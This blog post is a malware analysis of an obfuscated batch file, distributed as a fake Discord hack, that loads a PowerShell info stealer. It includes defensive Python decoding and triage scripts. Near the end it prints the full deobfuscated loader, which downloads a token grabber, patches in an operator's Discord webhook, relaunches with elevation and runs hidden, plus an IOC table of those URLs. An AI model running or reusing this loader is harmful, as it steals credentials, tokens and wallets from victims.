Deep dive into an obfuscated bat file #
You can download the sample here
Context #
A while ago, I decided to search for "discord hacks" on YouTube to find some malware that I could study, and I wasn't disappointed: I found a GitHub repository linked under a video offering a free Discord hack tool, wow!
So after reversing the malware (it was an info stealer written in Python; you can find the sample here), I reported it to GitHub. After a while, I noticed that there was an updated release with a different kind of malware! After some more reversing and reporting, I decided to document my research.
PS: GitHub won't ban the user, so if anyone reads this, can you report it? Link to the repo
Fun fact: as I am writing this article, a new malware has been uploaded to the repository.
UTF-16 LE, or is it? #
When opening the bat file for the first time, you see, well... something?
It seems that there's a problem with the encoding. The editor picks UTF-16 LE because the file starts with the bytes FF FE, the UTF-16 LE byte order mark, and then decodes all the single-byte text that follows as two-byte characters. cmd.exe does not honour that mark: it reads the bytes as they are, in the console code page, so the trick only hides the script from people, not from the interpreter. (The script's own anti-tamper check later on confirms this layout: it kills cmd.exe unless the first three bytes are FF FE 26, the mark followed by the `&` of the first line.) By reopening the file with the Western (Windows 1252) encoding, we can see something that makes "more" sense.
I can see the `cls` command on the first line, that's a start! The leading `&` turns the two mark bytes into a separate command name that cmd.exe fails to find, and `cls` then wipes that error from the console.
So now that we have fixed the encoding issue, we can clean the code to make it a little more readable.
Cleaning #
By browsing through the code, we can find very long lines full of whatever this is: `็็็็à`. At first, I thought that the encoding was still wrong, but when I looked at the start of those weird lines, I saw this: `::`
In a bat file, `::` comments out the entire line. Knowing that, we can remove a lot of lines!
We can also remove all the `,` and `;` at the start of the lines: cmd treats them as delimiters and skips them, so they do nothing for the program and their whole purpose is obfuscation.
Also, let's delete `%‮%`, which are empty variables: the characters between the percent signs are invisible Unicode control characters (a right-to-left override here), and in a batch file a reference to a variable that is not set expands to nothing.
After (a lot of) cleaning, we have a clearer file:
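To make the encoding fix and the cleaning reproducible, here is a small Python script that does both in one pass. It is an added example for this write-up, not the author's tooling and not part of the sample. It strips the UTF-16 LE byte order mark, decodes the rest as Windows-1252 the way the editor did, drops `::` lines and leading `,`/`;`, removes `%...%` references whose name contains no letters, digits or underscores, and keeps a list of what it removed so you can check later whether one of those "empty" variables is actually set somewhere. The input bytes are constructed for the example; the invisible character used there is U+00AD (soft hyphen), not the control character the real sample uses.

```python
import re

UTF16LE_BOM = b"\xff\xfe"

# Constructed input (not the real sample): a BOM glued onto single-byte text
SAMPLE_BAT = (
    b"\xff\xfe&cls\r\n"                                    # BOM, then '&cls'
    b";;@echo off\r\n"                                     # leading ';' are skipped by cmd
    b"::\xe0\xe0\xe0\xe0 filler line that never runs\r\n"  # '::' comments the line out
    b",;echo %\xad%hel%\xad%lo\r\n"                        # 'empty' variable wrappers
)

COMMENT_LINE = re.compile(r"^[\s,;]*::")   # '::' (possibly behind junk delimiters)
LEADING_DELIMS = re.compile(r"^[\s,;]+")   # cmd skips leading space, tab, ',' and ';'
EMPTY_VAR = re.compile(r"%([^%\w]+)%")     # %<no letters, digits or underscore>%


def decode_bat(raw: bytes) -> tuple[str, bool]:
    """Decode a batch file the way cmd.exe effectively reads it.

    cmd.exe never switches to UTF-16 because of a byte order mark; it reads
    the bytes in the console code page.  An editor sees FF FE and decodes
    everything as UTF-16 LE, which is the garbage the post shows.  We report
    whether the BOM was present and decode the rest as cp1252.
    """
    had_bom = raw.startswith(UTF16LE_BOM)
    body = raw[len(UTF16LE_BOM):] if had_bom else raw
    return body.decode("cp1252", errors="replace"), had_bom


def clean_bat(text: str) -> tuple[list[str], set[str]]:
    """Remove the obfuscator's filler and return (kept_lines, removed_vars).

    removed_vars lists every %...% token stripped as 'empty' so the analyst
    can check whether the script sets one of them further down.
    """
    kept, removed = [], set()
    for line in text.split("\n"):
        line = line.rstrip("\r")
        if COMMENT_LINE.match(line):
            continue
        line = LEADING_DELIMS.sub("", line)
        removed.update(m.group(0) for m in EMPTY_VAR.finditer(line))
        line = EMPTY_VAR.sub("", line)
        if line.strip():
            kept.append(line)
    return kept, removed


if __name__ == "__main__":
    text, had_bom = decode_bat(SAMPLE_BAT)
    print("UTF-16 LE BOM present:", had_bom)
    lines, removed = clean_bat(text)
    print("\n".join(lines))
    print("stripped variable references:", sorted(removed))
```

Keep the `removed` set around: when a later `set` line assigns one of those names, the "empty" reference was not empty after all and the affected lines have to be re-expanded with the real value.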
Now, let's jump to the real de-obfuscation part!
Environment variables, they are EVERYWHERE! #
`%coMMONproGRAmfileS(x86):~28,1%`, what the F*CK is that?
Well, after some research, this weird string actually makes sense: it is cmd's substring syntax, `%VARIABLE:~start,length%`. You can read it like this: take `1` character at index `28` of the environment variable `CommonProgramFiles(x86)` (variable names are case-insensitive in cmd, hence the random capitalisation). On a default 64-bit install that variable is `C:\Program Files (x86)\Common Files`, and index 28 is the letter `n`.
These environment variables have the same values on every default 64-bit Windows install (if not tampered with, and assuming the usual `C:` system drive). So that's how this program is obfuscated: every character of the real script is fetched from a string that cmd already has in memory. Pretty clever, right? Let's echo the first 6 lines in our cmd:
It works!
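Echoing lines by hand works, but a resolver is faster and also tells you which references it could not expand. The following Python script is an added example for this post, not the author's tooling and not part of the sample. The environment table holds the default values of an English 64-bit Windows install and is an assumption: verify it with `set` on the analysis VM, because the sample relies on these exact strings and a different value changes every decoded letter. The resolver implements cmd's `%VAR:~start,length%` rules in general (negative start, negative length, omitted length), which is more than the single `:~28,1` form the sample uses; the obfuscated lines in the demo are constructed in the sample's style, not copied from it.

```python
import re
from typing import Optional

# Assumed defaults for an English 64-bit Windows install (added for this
# example; check them with `set` on the target machine).
DEFAULT_ENV = {
    "ComSpec": r"C:\Windows\system32\cmd.exe",
    "CommonProgramFiles": r"C:\Program Files\Common Files",
    "CommonProgramFiles(x86)": r"C:\Program Files (x86)\Common Files",
    "CommonProgramW6432": r"C:\Program Files\Common Files",
    "OS": "Windows_NT",
    "PATHEXT": ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC",
    "ProgramData": r"C:\ProgramData",
    "ProgramFiles": r"C:\Program Files",
    "ProgramFiles(x86)": r"C:\Program Files (x86)",
    "ProgramW6432": r"C:\Program Files",
    "PUBLIC": r"C:\Users\Public",
    "SystemDrive": "C:",
    "SystemRoot": r"C:\Windows",
    "windir": r"C:\Windows",
}

# %NAME%, %NAME:~start% or %NAME:~start,length%  (start and length may be negative)
VAR_REF = re.compile(r"%([^%:]+)(?::~(-?\d+)(?:,(-?\d+))?)?%")


def cmd_substring(value: str, start: int, length: Optional[int]) -> str:
    """Mirror cmd.exe's %VAR:~start,length% rules.

    A negative start counts back from the end of the string, a negative
    length means 'stop that many characters before the end', and an omitted
    length means 'up to the end'.  Out-of-range values yield an empty string.
    """
    n = len(value)
    begin = start if start >= 0 else max(0, n + start)
    begin = min(begin, n)
    if length is None:
        end = n
    elif length >= 0:
        end = min(n, begin + length)
    else:
        end = max(begin, n + length)
    return value[begin:end]


def expand(line: str, env: dict = DEFAULT_ENV) -> tuple[str, list[str]]:
    """Expand every %VAR...% reference in one line.

    Returns (expanded_line, unresolved).  unresolved holds the references left
    untouched because the name is not in env, typically a variable the script
    only sets later: add those to env as you find them and expand again.
    """
    table = {name.upper(): value for name, value in env.items()}  # case-insensitive names
    unresolved: list[str] = []

    def replace(match: re.Match) -> str:
        name, start, length = match.group(1), match.group(2), match.group(3)
        value = table.get(name.upper())
        if value is None:
            unresolved.append(match.group(0))
            return match.group(0)
        if start is None:
            return value
        return cmd_substring(value, int(start), int(length) if length is not None else None)

    return VAR_REF.sub(replace, line), unresolved


if __name__ == "__main__":
    # Constructed lines in the sample's style (not copied from the malware)
    for obfuscated in (
        "%coMMONproGRAmfileS(x86):~28,1%",
        "%ProgramFiles:~14,1%%ProgramFiles(x86):~18,1%%ProgramFiles:~12,1%%ComSpec:~14,1%",
        "%ComSpec:~-7% /c dir %SystemRoot:~0,-4%",
        "echo %mystery%",
    ):
        print(obfuscated, "->", expand(obfuscated))
```

Feed the cleaned lines through `expand` one by one and collect the `unresolved` lists: they are exactly the variables the script initialises itself, which is the trap described above.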
So now, let's follow all the `goto`s and rewrite the code.
I noticed during the rewriting that a lot of empty variables were used, so I decided to delete them all. That was a mistake.
At some point in the code, those variables are actually initialized!
For a better view of this, let's clear the actual empty variables.
To continue the rewriting, we also have to initialize these variables in our terminal!
After a LOT of `echo`, I stumbled on some funny comments inside the code:
As I expected, this malware was obfuscated using a third-party program, which you can find here.
Interestingly enough, I found this string in the code: `$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$`, which is a reference to the standardized test file used to check that antivirus software is working (only the tail of the test string is present, so it does not trigger detection by itself). After browsing the somaliobfuscator code, it turns out the string was put there not so that the obfuscated file would be detected by antivirus, but because its creator was confident enough to include it, to show that the obfuscator was completely flawless.
(spoiler: it's not)
Now that we have readable code, let's remove all the `goto`s and go to (get it?) the essentials of the malware.
A standard info-stealer #
Oh, I was disappointed. All this, just for the file to drop an info stealer (written by the same person who wrote the somaliobfuscator) and launch it. Strictly speaking the bat is a loader: it fetches the stealer from GitHub at run time rather than carrying it.
Here is the full code after deobfuscation and cleaning:
```batch
&cls
@echo off

REM Drops a helper script that searches this file for the word "echo" and, depending on the result, either kills cmd.exe or self-deletes
echo @echo off > kdotQLWEBA.bat && echo findstr /i "echo" "%~f0" >> kdotQLWEBA.bat && echo if %1% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) ^2^>^n^u^l ^& del "%%~f0" ) >> kdotQLWEBA.bat && call kdotQLWEBA.bat

REM Relaunches itself elevated through a UAC prompt and exits the unelevated copy
powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "Start-Process -Verb RunAs -FilePath '%~f0'" & exit /b 0

REM Intended to change to the directory the script lives in
cd / %~dp0

REM Downloads Powershell-Token-Grabber and swaps its hard-coded webhook for the operator's own (the same URL with a "2" appended) before saving it as powershell123.ps1
powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/KDot227/Powershell-Token-Grabber/main/main.ps1' -UseBasicParsing; $t -replace 'https://discord.com/api/webhooks/1109064750232502322/YR75OFzI27mfrHFiih5q8BbvvgkdwJ83pukKZ9kbpI21qsJRN8NwENqXSRKLhSccWhj9', 'https://discord.com/api/webhooks/1109064750232502322/YR75OFzI27mfrHFiih5q8BbvvgkdwJ83pukKZ9kbpI21qsJRN8NwENqXSRKLhSccWhj92'| Out-File -FilePath 'powershell123.ps1' -Encoding ASCII"

REM Loosens the execution policy for the current user
powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force

REM Anti-tamper check: the file must still start with FF FE 26, the UTF-16 LE byte order mark followed by the "&" of the first line (the message says 0A but the code tests 0x26)
powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('%~f0') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE) -or ($bytes[2] -ne 0x26)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"

REM VM check: bails out if the computer model name contains "Virtual"
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$VM=Get-WmiObject -Class Win32_ComputerSystem ; if ($VM.Model -match 'Virtual') { Write-Host 'Virtual Machine Detected. Exiting script.' ; taskkill /F /IM cmd.exe }"

REM Runs the stealer in a hidden window
powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file powershell123.ps1

timeout 3 > nul
```
Yep, nothing fascinating. Even the VM check (the `Win32_ComputerSystem` model lookup) is code the obfuscator adds, not something the uploader wrote.
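The checks above are the malware's; what a defender wants is the reverse, a quick way to flag batch files carrying this obfuscator's fingerprints before anyone double-clicks them. The following Python triage function is an added example for this post, not code from the sample, the obfuscator or the author. Its thresholds are assumptions chosen for the example, and the two inputs are constructed blobs, not the real file. It looks for the UTF-16 LE byte order mark stuck in front of single-byte text (the FF FE 26 layout the script itself verifies), `::` filler lines with high bytes, a large number of `%VAR:~n,m%` substring references, the `$EICAR-...` tail and a Discord webhook URL.

```python
import re

UTF16LE_BOM = b"\xff\xfe"
# %NAME:~start[,length]% substring references, the obfuscator's building block
SUBSTR_REF = re.compile(rb"%[^%:\r\n]+:~-?\d+(?:,-?\d+)?%")
# Only the tail the post found in the sample, not the full EICAR test string
EICAR_TAIL = b"$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$"


def triage_bat(raw: bytes) -> dict:
    """Score a .bat for the traits seen in this sample.

    Heuristic only: the thresholds are assumptions for this example; tune
    them against your own benign batch corpus before alerting on them.
    """
    lines = raw.split(b"\n")
    comment_lines = [ln for ln in lines if ln.lstrip(b" \t,;").startswith(b"::")]
    report = {
        # FF FE followed by a printable ASCII byte: a UTF-16 BOM glued onto
        # single-byte text, which a genuine UTF-16 file would not look like
        "bom_then_ascii": raw.startswith(UTF16LE_BOM)
        and len(raw) > 2
        and 0x20 <= raw[2] < 0x7F,
        # '::' lines carrying high bytes: the filler comment lines
        "high_byte_comments": sum(1 for ln in comment_lines if any(b >= 0x80 for b in ln)),
        # how many substring references the file contains
        "substring_refs": len(SUBSTR_REF.findall(raw)),
        "eicar_tail": EICAR_TAIL in raw,
        "discord_webhook": b"discord.com/api/webhooks/" in raw,
    }
    report["suspicious"] = bool(
        report["bom_then_ascii"]
        or report["high_byte_comments"] >= 3
        or report["substring_refs"] >= 20
        or report["eicar_tail"]
    )
    return report


# Constructed inputs (not the real sample) for a quick self-check
OBFUSCATED = (
    b"\xff\xfe&cls\r\n"
    + (b"::" + b"\xe0\xb9\x87" * 40 + b"\r\n") * 3
    + b";,%coMMONproGRAmfileS(x86):~28,1%" * 25 + b"\r\n"
    + b"::$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$\r\n"
)
BENIGN = b"@echo off\r\nset SRC=%~dp0\r\necho building from %SRC%\r\n"

if __name__ == "__main__":
    for name, blob in (("obfuscated", OBFUSCATED), ("benign", BENIGN)):
        print(name, triage_bat(blob))
```

Run it over a share or a download folder with `Path(...).glob("*.bat")` and read the whole report rather than the single `suspicious` flag: a file that only trips `discord_webhook` is worth a look but is not this obfuscator, while `bom_then_ascii` alone is already a strong signal because no legitimate tool writes batch files that way.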
So, what does it do? #
This sample is hence an info stealer, or more precisely a loader for one: it downloads Powershell-Token-Grabber from GitHub at run time, patches in its own webhook, and runs it; the stealer then sends everything it collects to that Discord webhook.
According to the repository, this stealer sends :
- System Information
- Passwords
- Session tokens
- Crypto wallets
- Browser Data
- List of Apps
What I find terrifying is that VirusTotal shows only 2/59 detections, and that is LOW. So be careful about what you run on your system!
Afterword #
Even in my disappointment, I found this analysis very fun, and I learned a lot!
After going back to the malware repository, I found an interesting issue:
Someone's angry 🫣
That was my first blog post. I hope you found this interesting, and I'll come back with another one soon, I hope, maybe analyzing a new sample from the same repository 👀
Until then, see you!
IOCs #
| Indicator | Value |
|---|---|
| Discord webhook (the operator's, patched into the stealer) | https://discord.com/api/webhooks/1109064750232502322/YR75OFzI27mfrHFiih5q8BbvvgkdwJ83pukKZ9kbpI21qsJRN8NwENqXSRKLhSccWhj92 |
| Stealer source fetched at run time | https://raw.githubusercontent.com/KDot227/Powershell-Token-Grabber/main/main.ps1 |
| Files written in the working directory | `kdotQLWEBA.bat` (helper), `powershell123.ps1` (Powershell-Token-Grabber with the patched webhook) |
| File dropped | Powershell-Token-Grabber |